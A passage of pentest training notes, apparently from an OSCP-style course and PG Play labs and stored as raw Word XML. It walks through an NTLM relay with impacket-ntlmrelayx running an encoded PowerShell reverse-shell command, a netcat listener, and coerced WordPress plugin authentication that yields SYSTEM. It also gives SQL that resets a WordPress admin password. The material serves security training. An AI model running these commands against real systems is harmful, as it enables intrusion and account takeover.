          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.242 -c "powershell -enc JABjAGwAaQ..."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DF3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DF4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we'll set up a Netcat listener on port 9999 for the incoming reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DF5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DF6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="787400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="141" name="image135.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image135.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1000"/>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2DF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -nvlp 9999</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DF8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DF9">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now with everything set up, we can modify the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup directory path</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DFA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's set the path to the</w:t>
      </w:r>
      <w:hyperlink r:id="rId1001">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1002">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">URI reference</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">//192.168.119.5/test</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in which the IP is the address of our Kali machine and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">test</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a nonexistent path.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DFB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2247900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 24: Modified Backup directory path" id="382" name="image364.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 24: Modified Backup directory path" id="0" name="image364.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1003"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2247900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 24: Modified Backup directory path </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DFC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DFD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once entered, we can scroll down and click on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Save</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This should cause the WordPress plugin to authenticate to impacket-ntlmrelayx in the context of the user running WordPress.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DFE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DFF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2032000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="352" name="image332.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image332.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1004"/>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2E00">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E01">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 73 confirms the assumptions we made earlier. First, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">INTERNALSRV1/ADMINISTRATOR</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was used to perform the authentication. Second, by successfully authenticating to MAILSRV1, we confirmed that both machines use the same password for the local </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E02">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output also states that the relayed command on MAILSRV1 got executed. Let's check our Netcat listener for an incoming reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E03">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1727200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="104" name="image100.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image100.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1005"/>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2E04">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E05">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Great! We successfully obtained code execution as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> by authenticating as a local </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on MAILSRV1 by relaying an authentication attempt from the WordPress plugin on INTERNALSRV1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E06">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the next Learning Unit, we'll leverage the interactive shell on MAILSRV1 to obtain privileged access to the domain and its domain controller.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E07">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E08">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_v1nu1fo6ono0" w:id="405"/>
      <w:bookmarkEnd w:id="405"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reset admin password in wordpress_db MySQL database (and technically any other MySQL database)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E09">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E0A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was also done in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia Challenge Lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. I didn't do it myself, but someone else did it. It was done on the 172.16.xxx.7 machine and then they uploaded a malicious plugin that got them a reverse shell. Look at the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse shell with Admin Privileges using "Add new" button for plugins</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" section for more info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E0B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E0C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E0D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1006">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SunsetMidnight</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, we had a MySQL database called wordpress_db. Inside this database was a table called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wp_users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E0E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E0F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this table was the admin user, but it's MD5 hash was uncrackable, so we just reset the password to something we know</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E10">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1841500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="571" name="image183.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image183.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId522"/>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2E11">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UPDATE wp_users SET user_pass = </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MD5('password')</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE wp_users.user_login = "admin";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E12">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">update wp_users set user_pass=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MD5('password')</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> where ID=1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E13">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="566"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we can log into wordpress now with credentials admin : password</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E14">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E15">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In another writeup, they instead added another user (non-privileged) to the database in order to get past the WordPress login page. And they also have a theory of how to give it privileges. I talk about how to do that in the section below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E16">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x527w0wrshaf" w:id="406"/>
      <w:bookmarkEnd w:id="406"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add user in wordpress_db MySQL database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E17">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In another </w:t>
      </w:r>
      <w:hyperlink r:id="rId1007">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SunsetMidnight</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
